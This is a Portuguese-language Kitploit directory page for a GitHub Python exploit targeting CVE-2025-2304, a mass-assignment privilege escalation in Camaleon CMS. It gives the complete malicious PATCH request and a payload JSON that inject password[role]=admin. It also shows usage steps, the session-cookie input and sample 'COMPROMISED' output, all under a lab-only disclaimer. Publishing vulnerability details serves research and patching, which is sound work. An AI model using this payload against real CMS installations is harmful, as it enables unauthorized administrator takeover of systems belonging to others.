Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-2304-exploit — Script de exploração em Python para o CVE-2025-2304, uma escalada de privilégios por mass assignment no Camaleon CMS. Automatiza a análise do token CSRF e a injeção do parâmetro de função para elevar usuários autenticados a administrador em ambientes de laboratório controlados. | Kitploit
Ferramentas/GitHubGitHub/jeanback1/cve-2025-2304-exploit
Escalada de PrivilégiosGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
jeanback1/cve-2025-2304-exploit

CVE-2025-2304-exploit

Script de exploração em Python para o CVE-2025-2304, uma escalada de privilégios por mass assignment no Camaleon CMS. Automatiza a análise do token CSRF e a injeção do parâmetro de função para elevar usuários autenticados a administrador em ambientes de laboratório controlados.

Ver Repositório
42há 4 mesesAinda não revisado

CVE-2025-2304 - Escalação de Privilégios por Mass Assignment no Camaleon CMS

📌 Descrição do Projeto

CVE-2025-2304 é uma vulnerabilidade de Mass Assignment no Camaleon CMS (versões < 2.9.1) que permite a um usuário autenticado elevar seus privilégios para administrador manipulando o parâmetro role em solicitações de alteração de senha.

Python 3.x License Security Status

🚨 Explicação Técnica da Vulnerabilidade

Contexto da Vulnerabilidade

O Camaleon CMS usa Ruby on Rails e, na versão 2.9.0, apresenta uma vulnerabilidade de Mass Assignment no controller UsersController#updated_ajax. O controller usa .permit! sem restrições, permitindo que qualquer parâmetro enviado na solicitação seja diretamente atribuído ao modelo de usuário.

Vetor de Ataque

  1. Endpoint vulnerável: POST /admin/users/{user_id}/updated_ajax
  2. Parâmetro crítico: password[role] enviado dentro do namespace password
  3. Mecanismo: O controller processa params.require(:password) e então aplica .permit!, que não filtra nenhum parâmetro
  4. Resultado: Injeção do valor "admin" no campo role do usuário

Fluxo Técnico

root@kitploit:~
POST /admin/users/3/updated_ajax
Content-Type: application/x-www-form-urlencoded

authenticity_token=[TOKEN]&
password[password]=new_password&
password[password_confirmation]=new_password&
password[role]=admin&
password[id]=3&
_method=patch

O parâmetro password[role] é processado por User.update(permitted_params) e atribuído diretamente ao registro do usuário devido ao .permit!, elevando os privilégios de user para admin.

⚡ Instalação e Uso

Pré-requisitos

root@kitploit:~
# Python 3.6+
python3 --version

# Required libraries
pip install requests

Execução do Script

Versão em Inglês:

root@kitploit:~
python3 exploit_cve_2025_2304_en.py

Versão em Espanhol:

root@kitploit:~
python3 exploit_cve_2025_2304.py

Entrada Necessária

O script solicitará interativamente:

  1. URL base do servidor: http(s)://domain:port
  2. ID do usuário: Identificador do usuário atacante
  3. Cookie de sessão: valor de _cms_session (obtido após o login)
  4. Nova senha: Opcional (padrão: P@ssw0rd_lab_2025!)

Exemplo de Comando Completo

root@kitploit:~
python3 exploit_cve_2025_2304_en.py
root@kitploit:~
[?] Base URL of the server (ex: http://localhost:3000) : http://192.168.1.100:8080
[?] User ID of the attacker user (ex: 3) : 5
[?] Session cookie (_cms_session=VALUE) : _cms_session=abc123def456

🔧 Sobre Este Script

Por que criei isto?

Quando encontrei essa vulnerabilidade, meu primeiro instinto foi testá-la manualmente com o Burp Suite — e funcionou. Mas eu queria ir além e transformar esse processo manual em algo repetível e portátil, então escrevi este script. Além de apenas explorar a falha, desenvolver isso me deu a oportunidade de trabalhar com algumas coisas que considero genuinamente interessantes:

  • Automatizar fluxos HTTP de múltiplas etapas com gerenciamento de sessão
  • Analisar tokens CSRF dinamicamente a partir de respostas ao vivo
  • Lidar com respostas JSON/HTML inconsistentes do mesmo endpoint
  • Saber exatamente quando o exploit teve sucesso — e quando não teve

Não estou tentando substituir o Burp ou o Caido. Essas ferramentas são insubstituíveis para testes interativos. Isto é apenas o que acontece quando prefiro escrever um script a me repetir.

⚠️ Aviso Legal e Considerações Éticas

AVISO LEGAL IMPORTANTE

root@kitploit:~
THIS SCRIPT IS EXCLUSIVELY FOR:
- Controlled laboratory environments
- Systems you own or have explicit authorization to test
- Educational purposes and authorized research

STRICTLY PROHIBITED:
- Use on systems without authorization
- Application with malicious intent
- Violation of data protection laws
- Compromising third-party security

The author is not responsible for misuse of this tool.

📊 Exemplos de Capturas de Tela

Execução Bem-Sucedida

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║        CVE-2025-2304 │ Camaleon CMS Mass Assignment          ║
║        Privilege Escalation: user → admin                    ║
║        [LABORATORY / CONTROLLED ENVIRONMENT]                 ║
╚══════════════════════════════════════════════════════════════╝

[✔] CSRF token obtained: abc123def456...
[✔] EXPLOIT SUCCESSFUL: Server confirmed the update.
[✔] Status : COMPROMISED
   User 5 should now have 'admin' role.

Estrutura do Payload

root@kitploit:~
{
    "authenticity_token": "abcd1234",
    "password[password]": "P@ssw0rd_lab_2025!",
    "password[password_confirmation]": "P@ssw0rd_lab_2025!",
    "password[role]": "admin",
    "password[id]": "5",
    "_method": "patch"
}

🛠 Roadmap e Melhorias Futuras

Melhorias Planejadas

  1. Automação de login: Integração para obter sessão automaticamente
  2. Detecção de versão: Script de fingerprinting para confirmar a versão vulnerável
  3. Modo verbose/quiet para saída mais limpa em pipelines automatizados
  4. Testes em lote: Capacidade de testar vários usuários/URLs simultaneamente
  5. Relatório gerado: Exportar resultados em formato JSON/HTML

Extensibilidade

O código é estruturado de forma modular para facilitar:

  • Adaptação a outras vulnerabilidades de Mass Assignment
  • Integração em frameworks de pentest
  • Adição de recursos de logging e monitoramento

📚 Referências e Recursos

  • CVE Oficial: CVE-2025-2304
  • Camaleon CMS: Repositório Oficial
  • Correção: A versão 2.9.1 corrige o uso de .permit!
  • Documentação do Rails: Strong Parameters

🤝 Contribuições

São bem-vindas contribuições que:

  1. Melhorem a detecção de condição de sucesso
  2. Adicionem funcionalidades mantendo o foco ético
  3. Corrijam bugs ou melhorem o tratamento de erros
  4. Documentem casos de uso adicionais

Lembre-se: Este projeto tem finalidade exclusivamente educacional e de pesquisa autorizada.


Última atualização: abril de 2025 | Por Analista de Segurança (Ambiente de Laboratório)

Baixar ferramenta